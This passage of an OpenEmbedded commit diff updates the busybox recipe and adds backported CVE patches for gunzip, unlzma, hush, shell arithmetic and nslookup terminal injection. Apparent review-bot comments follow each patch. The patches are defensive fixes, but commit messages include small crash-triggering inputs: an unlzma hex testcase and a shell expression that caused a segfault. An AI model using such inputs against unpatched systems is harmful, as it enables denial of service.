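 DESCRIPTION = "The master copies of the user database files (/etc/passwd and /etc/group). The update-passwd tool is also provided to keep the system databases synchronized with these master files."
+HOMEPAGE = "https://launchpad.net/base-passwd"
 SECTION = "base"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a"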
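--- a/meta/recipes-core/busybox/busybox.inc
+++ b/meta/recipes-core/busybox/busybox.inc
@@ -139,6 +139,10 @@ do_configure () {
  do_prepare_config
  merge_config.sh -m .config ${@" ".join(find_cfgs(d))}
  cml1_do_configure
+
+ # Save a copy of .config and autoconf.h.
+ cp .config .config.orig
+ cp include/autoconf.h include/autoconf.h.orig
 }
 
 do_compile() {
@@ -146,13 +150,17 @@ do_compile() {
  if [ "${BUILD_REPRODUCIBLE_BINARIES}" = "1" ]; then
  export KCONFIG_NOTIMESTAMP=1
  fi
+
+ # Ensure we start do_compile with the original .config and autoconf.h.
+ # These files should always have matching timestamps.
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
+
  if [ "${BUSYBOX_SPLIT_SUID}" = "1" -a x`grep "CONFIG_FEATURE_INDIVIDUAL=y" .config` = x ]; then
+ # Guard againt interrupted do_compile: clean temporary files.
+ rm -f .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+
  # split the .config into two parts, and make two busybox binaries
- if [ -e .config.orig ]; then
- # Need to guard again an interrupted do_compile - restore any backup
- cp .config.orig .config
- fi
- cp .config .config.orig
  oe_runmake busybox.cfg.suid
  oe_runmake busybox.cfg.nosuid
 
@@ -189,15 +197,18 @@ do_compile() {
  bbfatal "busybox suid binary incorrectly provides /bin/sh"
  fi
 
- # copy .config.orig back to .config, because the install process may check this file
- cp .config.orig .config
  # cleanup
- rm .config.orig .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+ rm .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
  else
  oe_runmake busybox_unstripped
  cp busybox_unstripped busybox
  oe_runmake busybox.links
  fi
+
+ # restore original .config and autoconf.h, because the install process
+ # may check these files
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
 }
 
 do_install () {
@@ -348,7 +359,7 @@ do_install_ptest () {
  # These access the internet which is not guaranteed to work on machines running the tests
  rm -rf ${D}${PTEST_PATH}/testsuite/wget
  sort ${B}/.config > ${D}${PTEST_PATH}/.config
- ln -s /bin/busybox ${D}${PTEST_PATH}/busybox
+ ln -s ${base_bindir}/busybox ${D}${PTEST_PATH}/busybox
 }
 
 inherit update-alternatives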
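Review bot: The new comment in the split-suid branch of `do_compile` reads `# Guard againt interrupted do_compile: clean temporary files.`; it should say `against`. The comment above the restore step says the two files should always have matching timestamps, but plain `cp` gives each copy the time of the copy rather than the saved mtime, so if the saved timestamps are what matters `cp -p .config.orig .config` (and the same for `autoconf.h`) would keep them; the hunk does not show which is intended.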
diff --git a/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
new file mode 100644
index 0000000000..b75f0907e7
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
@@ -0,0 +1,51 @@
1From fe791386ebc270219ca00406c9fdadc5130b64ee Mon Sep 17 00:00:00 2001
2From: Samuel Sapalski <samuel.sapalski@nokia.com>
3Date: Wed, 3 Mar 2021 16:31:22 +0100
4Subject: [PATCH] decompress_gunzip: Fix DoS if gzip is corrupt
5
6On certain corrupt gzip files, huft_build will set the error bit on
7the result pointer. If afterwards abort_unzip is called huft_free
8might run into a segmentation fault or an invalid pointer to
9free(p).
10
11In order to mitigate this, we check in huft_free if the error bit
12is set and clear it before the linked list is freed.
13
14Signed-off-by: Samuel Sapalski <samuel.sapalski@nokia.com>
15Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
16Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
17
18Upstream-Status: Backport
19CVE: CVE-2021-28831
20Comment: One hunk from this patch is removed as it was not relevant.
21Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
22Signed-off-by: Akash Hadke <Akash.Hadke@kpit.com>
23---
24 archival/libarchive/decompress_gunzip.c | 12 ++++++++++--
25 1 file changed, 10 insertions(+), 2 deletions(-)
26
27diff --git a/archival/libarchive/decompress_gunzip.c b/archival/libarchive/decompress_gunzip.c
28index eb3b64930..e93cd5005 100644
29--- a/archival/libarchive/decompress_gunzip.c
30+++ b/archival/libarchive/decompress_gunzip.c
31@@ -220,10 +220,20 @@ static const uint8_t border[] ALIGN1 = {
32 * each table.
33 * t: table to free
34 */
35+#define BAD_HUFT(p) ((uintptr_t)(p) & 1)
36+#define ERR_RET ((huft_t*)(uintptr_t)1)
37 static void huft_free(huft_t *p)
38 {
39 huft_t *q;
40
41+ /*
42+ * If 'p' has the error bit set we have to clear it, otherwise we might run
43+ * into a segmentation fault or an invalid pointer to free(p)
44+ */
45+ if (BAD_HUFT(p)) {
46+ p = (huft_t*)((uintptr_t)(p) ^ (uintptr_t)(ERR_RET));
47+ }
48+
49 /* Go through linked list, freeing from the malloced (t[-1]) address. */
50 while (p) {
51 q = (--p)->v.t;
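Review bot: The patch header records `Upstream-Status: Backport` (patch line 18) with no upstream commit or URL, and the `Comment:` on line 20 says a hunk was dropped without naming it, so the backport cannot be checked against its origin from this file alone. I would write `Upstream-Status: Backport [<upstream commit URL>]` and name the dropped hunk in the comment. In the code itself, `huft_free()` clears the tag with `^ ERR_RET` only after `BAD_HUFT(p)` is true, which is correct. If the tree already defines `BAD_HUFT`/`ERR_RET` further down the file (not visible here), the two definitions must stay token-identical or the build will warn about a redefinition. The body of `huft_free()` continues past the hunk.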
diff --git a/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
new file mode 100644
index 0000000000..18bf5f19e4
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
@@ -0,0 +1,38 @@
1From c7e181fdf58c392e06ab805e2c044c3e57d5445a Mon Sep 17 00:00:00 2001
2From: Ariadne Conill <ariadne@dereferenced.org>
3Date: Sun, 3 Apr 2022 12:14:33 +0000
4Subject: [PATCH] libbb: sockaddr2str: ensure only printable characters are
5 returned for the hostname part
6
7CVE: CVE-2022-28391
8Upstream-Status: Pending
9Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
10Signed-off-by: Steve Sakoman <steve@sakoman.com>
11---
12 libbb/xconnect.c | 5 +++--
13 1 file changed, 3 insertions(+), 2 deletions(-)
14
15diff --git a/libbb/xconnect.c b/libbb/xconnect.c
16index eb2871cb1..b5520bb21 100644
17--- a/libbb/xconnect.c
18+++ b/libbb/xconnect.c
19@@ -501,8 +501,9 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
20 );
21 if (rc)
22 return NULL;
23+ /* ensure host contains only printable characters */
24 if (flags & IGNORE_PORT)
25- return xstrdup(host);
26+ return xstrdup(printable_string(host));
27 #if ENABLE_FEATURE_IPV6
28 if (sa->sa_family == AF_INET6) {
29 if (strchr(host, ':')) /* heh, it's not a resolved hostname */
30@@ -513,7 +514,7 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
31 #endif
32 /* For now we don't support anything else, so it has to be INET */
33 /*if (sa->sa_family == AF_INET)*/
34- return xasprintf("%s:%s", host, serv);
35+ return xasprintf("%s:%s", printable_string(host), serv);
36 /*return xstrdup(host);*/
37 }
38
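Review bot: Only two of the return paths in `sockaddr2str()` pass `host` through `printable_string()`; the `AF_INET6` branch that starts at `if (strchr(host, ':'))` (patch line 29) has its return outside both hunks, and if that return formats `host` directly, a name containing `:` would still reach the caller unsanitized. Sanitizing once right after the `if (rc) return NULL;` check, e.g. `const char *h = printable_string(host);` and using `h` in every return, covers all paths at the same time. The added comment on line 23 sits above the `IGNORE_PORT` test but describes the whole function tail, so it would read better next to that single assignment. `Upstream-Status: Pending` means there is no upstream commit to compare this fix against yet.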
diff --git a/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
new file mode 100644
index 0000000000..4a1960dff2
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
@@ -0,0 +1,81 @@
1From ceb378209f953ea745ed93a8645567196380ce3c Mon Sep 17 00:00:00 2001
2From: Andrej Valek <andrej.valek@siemens.com>
3Date: Thu, 24 Jun 2021 19:13:22 +0200
4Subject: [PATCH] mktemp: add tmpdir option
5
6Make mktemp more compatible with coreutils.
7- add "--tmpdir" option
8- add long variants for "d,q,u" options
9
10Upstream-Status: Submitted [http://lists.busybox.net/pipermail/busybox/2021-June/088932.html]
11
12Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
13Signed-off-by: Peter Marko <peter.marko@siemens.com>
14---
15 coreutils/mktemp.c | 26 ++++++++++++++++++--------
16 1 file changed, 18 insertions(+), 8 deletions(-)
17
18diff --git a/coreutils/mktemp.c b/coreutils/mktemp.c
19index 5393320a5..05c6d98c6 100644
20--- a/coreutils/mktemp.c
21+++ b/coreutils/mktemp.c
22@@ -39,16 +39,17 @@
23 //kbuild:lib-$(CONFIG_MKTEMP) += mktemp.o
24
25 //usage:#define mktemp_trivial_usage
26-//usage: "[-dt] [-p DIR] [TEMPLATE]"
27+//usage: "[-dt] [-p DIR, --tmpdir[=DIR]] [TEMPLATE]"
28 //usage:#define mktemp_full_usage "\n\n"
29 //usage: "Create a temporary file with name based on TEMPLATE and print its name.\n"
30 //usage: "TEMPLATE must end with XXXXXX (e.g. [/dir/]nameXXXXXX).\n"
31 //usage: "Without TEMPLATE, -t tmp.XXXXXX is assumed.\n"
32-//usage: "\n -d Make directory, not file"
33-//usage: "\n -q Fail silently on errors"
34-//usage: "\n -t Prepend base directory name to TEMPLATE"
35-//usage: "\n -p DIR Use DIR as a base directory (implies -t)"
36-//usage: "\n -u Do not create anything; print a name"
37+//usage: "\n -d Make directory, not file"
38+//usage: "\n -q Fail silently on errors"
39+//usage: "\n -t Prepend base directory name to TEMPLATE"
40+//usage: "\n -p DIR, --tmpdir[=DIR] Use DIR as a base directory (implies -t)"
41+//usage: "\n For --tmpdir is a optional one."
42+//usage: "\n -u Do not create anything; print a name"
43 //usage: "\n"
44 //usage: "\nBase directory is: -p DIR, else $TMPDIR, else /tmp"
45 //usage:
46@@ -72,13 +73,22 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
47 OPT_t = 1 << 2,
48 OPT_p = 1 << 3,
49 OPT_u = 1 << 4,
50+ OPT_td = 1 << 5,
51 };
52
53 path = getenv("TMPDIR");
54 if (!path || path[0] == '\0')
55 path = "/tmp";
56
57- opts = getopt32(argv, "^" "dqtp:u" "\0" "?1"/*1 arg max*/, &path);
58+ opts = getopt32long(argv, "^"
59+ "dqtp:u\0"
60+ "?1" /* 1 arg max */,
61+ "directory\0" No_argument "d"
62+ "quiet\0" No_argument "q"
63+ "dry-run\0" No_argument "u"
64+ "tmpdir\0" Optional_argument "\xff"
65+ , &path, &path
66+ );
67
68 chp = argv[optind];
69 if (!chp) {
70@@ -95,7 +105,7 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
71 goto error;
72 }
73 #endif
74- if (opts & (OPT_t|OPT_p))
75+ if (opts & (OPT_t|OPT_p|OPT_td))
76 chp = concat_path_file(path, chp);
77
78 if (opts & OPT_u) {
79--
802.11.0
81
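Review bot: `OPT_td = 1 << 5` (patch line 50) is correct only because the long-only `"tmpdir\0" Optional_argument "\xff"` entry is the first option after the five short ones in `dqtp:u`, and nothing in the code says so. A comment such as `/* --tmpdir: long-only, takes the bit after 'u' */` on the enum line would keep the two in step. Both `-p` and `--tmpdir` store into `path` (`&path, &path`), so when both are given presumably the later one wins; that is worth a word in the usage text. The usage line `For --tmpdir is a optional one.` reads better as `DIR is optional for --tmpdir.`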
diff --git a/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
new file mode 100644
index 0000000000..2c9da33a51
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
@@ -0,0 +1,64 @@
1From f8ad7c331b25ba90fd296b37c443b4114cb196e2 Mon Sep 17 00:00:00 2001
2From: Ariadne Conill <ariadne@dereferenced.org>
3Date: Sun, 3 Apr 2022 12:16:45 +0000
4Subject: [PATCH] nslookup: sanitize all printed strings with printable_string
5
6Otherwise, terminal sequences can be injected, which enables various terminal injection
7attacks from DNS results.
8
9MJ: One chunk wasn't applicable on 1.31.1 version, because parsing of
10SRV records was added only in newer 1.32.0 with:
11 commit 6b4960155e94076bf25518e4e268a7a5f849308e
12 Author: Jo-Philipp Wich <jo@mein.io>
13 Date: Thu Jun 27 17:27:29 2019 +0200
14
15 nslookup: implement support for SRV records
16
17CVE: CVE-2022-28391
18Upstream-Status: Pending
19Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
20Signed-off-by: Steve Sakoman <steve@sakoman.com>
21---
22 networking/nslookup.c | 8 ++++----
23 1 file changed, 4 insertions(+), 4 deletions(-)
24
25diff --git a/networking/nslookup.c b/networking/nslookup.c
26index 24e09d4f0..89b9c8a13 100644
27--- a/networking/nslookup.c
28+++ b/networking/nslookup.c
29@@ -404,7 +404,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
30 //printf("Unable to uncompress domain: %s\n", strerror(errno));
31 return -1;
32 }
33- printf(format, ns_rr_name(rr), dname);
34+ printf(format, ns_rr_name(rr), printable_string(dname));
35 break;
36
37 case ns_t_mx:
38@@ -419,7 +419,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
39 //printf("Cannot uncompress MX domain: %s\n", strerror(errno));
40 return -1;
41 }
42- printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, dname);
43+ printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, printable_string(dname));
44 break;
45
46 case ns_t_txt:
47@@ -431,7 +431,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
48 if (n > 0) {
49 memset(dname, 0, sizeof(dname));
50 memcpy(dname, ns_rr_rdata(rr) + 1, n);
51- printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), dname);
52+ printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), printable_string(dname));
53 }
54 break;
55
56@@ -461,7 +461,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
57 return -1;
58 }
59
60- printf("\tmail addr = %s\n", dname);
61+ printf("\tmail addr = %s\n", printable_string(dname));
62 cp += n;
63
64 printf("\tserial = %lu\n", ns_get32(cp));
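Review bot: Each changed `printf` sanitizes `dname` but still prints `ns_rr_name(rr)` as is (patch lines 34, 43, 52), and that owner name comes from the same DNS reply. Whether the resolver library already escapes it is not visible here, so I would wrap it too, e.g. `printable_string(ns_rr_name(rr))`, after confirming that `printable_string()` can hand back two results that are both live in one call. The commit message notes that the SRV chunk was dropped for 1.31.1; any other `printf` of reply data in `parse_reply()` outside these four hunks should get the same treatment.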
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
new file mode 100644
index 0000000000..aef8a3db85
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
@@ -0,0 +1,53 @@
1From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001
2From: Denys Vlasenko <vda.linux@googlemail.com>
3Date: Tue, 15 Jun 2021 15:07:57 +0200
4Subject: [PATCH] unlzma: fix a case where we could read before beginning of
5 buffer
6Cc: pavel@zhukoff.net
7
8Testcase:
9
10 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6
11 00 17 02 10 11 0f ff 00 16 00 00
12
13Unfortunately, the bug is not reliably causing a segfault,
14the behavior depends on what's in memory before the buffer.
15
16function old new delta
17unpack_lzma_stream 2762 2768 +6
18
19Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
20
21Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
22
23CVE: CVE-2021-42374
24Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937]
25Comment: testdata dropped because of binary format
26
27---
28 archival/libarchive/decompress_unlzma.c | 5 ++++-
29 testsuite/unlzma.tests | 17 +++++++++++++----
30 testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes
31 3 files changed, 17 insertions(+), 5 deletions(-)
32 create mode 100644 testsuite/unlzma_issue_3.lzma
33
34diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c
35index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644
36--- a/archival/libarchive/decompress_unlzma.c
37+++ b/archival/libarchive/decompress_unlzma.c
38@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate)
39 uint32_t pos;
40
41 pos = buffer_pos - rep0;
42- if ((int32_t)pos < 0)
43+ if ((int32_t)pos < 0) {
44 pos += header.dict_size;
45+ if ((int32_t)pos < 0)
46+ goto bad;
47+ }
48 match_byte = buffer[pos];
49 do {
50 int bit;
51--
522.34.0
53
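Review bot: The diffstat on patch lines 28–32 still lists `testsuite/unlzma.tests` and `unlzma_issue_3.lzma`, but only the `decompress_unlzma.c` hunk is carried, so the regression test for this out-of-bounds read is not part of the backport. The `Comment:` line mentions the binary test data only; it should also say that the test script change was dropped, for example `Comment: testdata and testsuite/unlzma.tests hunk dropped (binary file)`. The added check itself is sound for the visible code: after `pos += header.dict_size` a still-negative `pos` goes to `bad` before `buffer[pos]` is read. `unpack_lzma_stream()` continues outside the hunk, so other uses of `buffer_pos - rep0` cannot be checked from here.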
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
new file mode 100644
index 0000000000..c913eaee9c
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
@@ -0,0 +1,138 @@
1From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001
2From: Denys Vlasenko <vda.linux@googlemail.com>
3Date: Tue, 15 Jun 2021 16:05:57 +0200
4Subject: hush: fix handling of \^C and "^C"
5
6function old new delta
7parse_stream 2238 2252 +14
8encode_string 243 256 +13
9------------------------------------------------------------------------------
10(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes
11
12Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
13(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985)
14
15Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
16
17CVE: CVE-2021-42376
18Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba]
19Comment: No changes in any hunk
20---
21 shell/ash_test/ash-misc/control_char3.right | 1 +
22 shell/ash_test/ash-misc/control_char3.tests | 2 ++
23 shell/ash_test/ash-misc/control_char4.right | 1 +
24 shell/ash_test/ash-misc/control_char4.tests | 2 ++
25 shell/hush.c | 11 +++++++++++
26 shell/hush_test/hush-misc/control_char3.right | 1 +
27 shell/hush_test/hush-misc/control_char3.tests | 2 ++
28 shell/hush_test/hush-misc/control_char4.right | 1 +
29 shell/hush_test/hush-misc/control_char4.tests | 2 ++
30 9 files changed, 23 insertions(+)
31 create mode 100644 shell/ash_test/ash-misc/control_char3.right
32 create mode 100755 shell/ash_test/ash-misc/control_char3.tests
33 create mode 100644 shell/ash_test/ash-misc/control_char4.right
34 create mode 100755 shell/ash_test/ash-misc/control_char4.tests
35 create mode 100644 shell/hush_test/hush-misc/control_char3.right
36 create mode 100755 shell/hush_test/hush-misc/control_char3.tests
37 create mode 100644 shell/hush_test/hush-misc/control_char4.right
38 create mode 100755 shell/hush_test/hush-misc/control_char4.tests
39
40diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right
41new file mode 100644
42index 000000000..283e02cbb
43--- /dev/null
44+++ b/shell/ash_test/ash-misc/control_char3.right
45@@ -0,0 +1 @@
46+SHELL: line 1: : not found
47diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests
48new file mode 100755
49index 000000000..4359db3f3
50--- /dev/null
51+++ b/shell/ash_test/ash-misc/control_char3.tests
52@@ -0,0 +1,2 @@
53+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
54+$THIS_SH -c '\' SHELL
55diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right
56new file mode 100644
57index 000000000..2bf18e684
58--- /dev/null
59+++ b/shell/ash_test/ash-misc/control_char4.right
60@@ -0,0 +1 @@
61+SHELL: line 1: -: not found
62diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests
63new file mode 100755
64index 000000000..48010f154
65--- /dev/null
66+++ b/shell/ash_test/ash-misc/control_char4.tests
67@@ -0,0 +1,2 @@
68+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
69+$THIS_SH -c '"-"' SHELL
70diff --git a/shell/hush.c b/shell/hush.c
71index 9fead37da..249728b9d 100644
72--- a/shell/hush.c
73+++ b/shell/hush.c
74@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string,
75 }
76 #endif
77 o_addQchr(dest, ch);
78+ if (ch == SPECIAL_VAR_SYMBOL) {
79+ /* Convert "^C" to corresponding special variable reference */
80+ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS);
81+ o_addchr(dest, SPECIAL_VAR_SYMBOL);
82+ }
83 goto again;
84 #undef as_string
85 }
86@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring,
87 if (ch == '\n')
88 continue; /* drop \<newline>, get next char */
89 nommu_addchr(&ctx.as_string, '\\');
90+ if (ch == SPECIAL_VAR_SYMBOL) {
91+ nommu_addchr(&ctx.as_string, ch);
92+ /* Convert \^C to corresponding special variable reference */
93+ goto case_SPECIAL_VAR_SYMBOL;
94+ }
95 o_addchr(&ctx.word, '\\');
96 if (ch == EOF) {
97 /* Testcase: eval 'echo Ok\' */
98@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring,
99 /* Note: nommu_addchr(&ctx.as_string, ch) is already done */
100
101 switch (ch) {
102+ case_SPECIAL_VAR_SYMBOL:
103 case SPECIAL_VAR_SYMBOL:
104 /* Convert raw ^C to corresponding special variable reference */
105 o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL);
106diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right
107new file mode 100644
108index 000000000..94b4f8699
109--- /dev/null
110+++ b/shell/hush_test/hush-misc/control_char3.right
111@@ -0,0 +1 @@
112+hush: can't execute '': No such file or directory
113diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests
114new file mode 100755
115index 000000000..4359db3f3
116--- /dev/null
117+++ b/shell/hush_test/hush-misc/control_char3.tests
118@@ -0,0 +1,2 @@
119+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
120+$THIS_SH -c '\' SHELL
121diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right
122new file mode 100644
123index 000000000..698e21427
124--- /dev/null
125+++ b/shell/hush_test/hush-misc/control_char4.right
126@@ -0,0 +1 @@
127+hush: can't execute '-': No such file or directory
128diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests
129new file mode 100755
130index 000000000..48010f154
131--- /dev/null
132+++ b/shell/hush_test/hush-misc/control_char4.tests
133@@ -0,0 +1,2 @@
134+# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
135+$THIS_SH -c '"-"' SHELL
136--
137cgit v1.2.3
138
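Review bot: The new `goto case_SPECIAL_VAR_SYMBOL` in the backslash branch of `parse_stream()` (patch line 93) jumps into the `switch (ch)` further down, and the label on line 102 carries no hint of where it is entered from. The existing note above the switch says `nommu_addchr(&ctx.as_string, ch)` is already done, which the new branch honours by adding `ch` itself before the jump; a comment on the label such as `/* also entered by goto from the backslash case, which has already added ch to as_string */` would keep that invariant visible. The header does not say what the CVE is beyond the subject line, so a one-line description of the failure would help whoever audits this backport later. Both functions continue outside the hunks.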
diff --git a/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
new file mode 100644
index 0000000000..dfba2a7e0f
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
@@ -0,0 +1,82 @@
1From c18ebf861528ef24958dd99a146482d2a40014c7 Mon Sep 17 00:00:00 2001
2From: Denys Vlasenko <vda.linux@googlemail.com>
3Date: Mon, 12 Jun 2023 17:48:47 +0200
4Subject: [PATCH] shell: avoid segfault on ${0::0/0~09J}. Closes 15216
5
6function old new delta
7evaluate_string 1011 1053 +42
8
9CVE: CVE-2022-48174
10Upstream-Status: Backport [d417193cf37ca1005830d7e16f5fa7e1d8a44209]
11Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
12---
13 shell/math.c | 39 +++++++++++++++++++++++++++++++++++----
14 1 file changed, 35 insertions(+), 4 deletions(-)
15
16diff --git a/shell/math.c b/shell/math.c
17index af1ab55c0..79824e81f 100644
18--- a/shell/math.c
19+++ b/shell/math.c
20@@ -578,6 +578,28 @@ static arith_t strto_arith_t(const char *nptr, char **endptr)
21 # endif
22 #endif
23
24+//TODO: much better estimation than expr_len/2? Such as:
25+//static unsigned estimate_nums_and_names(const char *expr)
26+//{
27+// unsigned count = 0;
28+// while (*(expr = skip_whitespace(expr)) != '\0') {
29+// const char *p;
30+// if (isdigit(*expr)) {
31+// while (isdigit(*++expr))
32+// continue;
33+// count++;
34+// continue;
35+// }
36+// p = endofname(expr);
37+// if (p != expr) {
38+// expr = p;
39+// count++;
40+// continue;
41+// }
42+// }
43+// return count;
44+//}
45+
46 static arith_t FAST_FUNC
47 evaluate_string(arith_state_t *math_state, const char *expr)
48 {
49@@ -585,10 +607,12 @@ evaluate_string(arith_state_t *math_state, const char *expr)
50 const char *errmsg;
51 const char *start_expr = expr = skip_whitespace(expr);
52 unsigned expr_len = strlen(expr) + 2;
53- /* Stack of integers */
54- /* The proof that there can be no more than strlen(startbuf)/2+1
55- * integers in any given correct or incorrect expression
56- * is left as an exercise to the reader. */
57+ /* Stack of integers/names */
58+ /* There can be no more than strlen(startbuf)/2+1
59+ * integers/names in any given correct or incorrect expression.
60+ * (modulo "09v09v09v09v09v" case,
61+ * but we have code to detect that early)
62+ */
63 var_or_num_t *const numstack = alloca((expr_len / 2) * sizeof(numstack[0]));
64 var_or_num_t *numstackptr = numstack;
65 /* Stack of operator tokens */
66@@ -657,6 +681,13 @@ evaluate_string(arith_state_t *math_state, const char *expr)
67 numstackptr->var = NULL;
68 errno = 0;
69 numstackptr->val = strto_arith_t(expr, (char**) &expr);
70+ /* A number can't be followed by another number, or a variable name.
71+ * We'd catch this later anyway, but this would require numstack[]
72+ * to be twice as deep to handle strings where _every_ char is
73+ * a new number or name. Example: 09v09v09v09v09v09v09v09v09v
74+ */
75+ if (isalnum(*expr) || *expr == '_')
76+ goto err;
77 if (errno)
78 numstackptr->val = 0; /* bash compat */
79 goto num;
80--
812.40.1
82
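Review bot: The `alloca((expr_len / 2) * sizeof(numstack[0]))` sizing in `evaluate_string()` now depends on the early rejection added at patch lines 75–76, yet the stack comment only says `we have code to detect that early` without pointing at it. I would extend the guard's comment with `/* numstack[] sizing above relies on this check */` so a later edit does not remove one without the other. The commented-out `estimate_nums_and_names()` sketch (lines 24–44) is 20 lines of dead code carried from upstream; that is fine for a verbatim backport but worth knowing when refreshing the patch. The allocation also stays on the stack and scales with the expression length, which this change does not alter.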
diff --git a/meta/recipes-core/busybox/busybox_1.31.1.bb b/meta/recipes-core/busybox/busybox_1.31.1.bb
index 7563368287..94aa1467df 100644
--- a/meta/recipes-core/busybox/busybox_1.31.1.bb
+++ b/meta/recipes-core/busybox/busybox_1.31.1.bb
@@ -50,7 +50,15 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \
50 file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \ 50 file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \
51 file://busybox-CVE-2018-1000500.patch \ 51 file://busybox-CVE-2018-1000500.patch \
52 file://0001-hwclock-make-glibc-2.31-compatible.patch \ 52 file://0001-hwclock-make-glibc-2.31-compatible.patch \
53" 53 file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \
54 file://0001-mktemp-add-tmpdir-option.patch \
55 file://CVE-2021-42374.patch \
56 file://CVE-2021-42376.patch \
57 file://CVE-2021-423xx-awk.patch \
58 file://CVE-2022-48174.patch \
59 file://0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch \
60 file://0002-nslookup-sanitize-all-printed-strings-with-printable.patch \
61 "
54SRC_URI_append_libc-musl = " file://musl.cfg " 62SRC_URI_append_libc-musl = " file://musl.cfg "
55 63
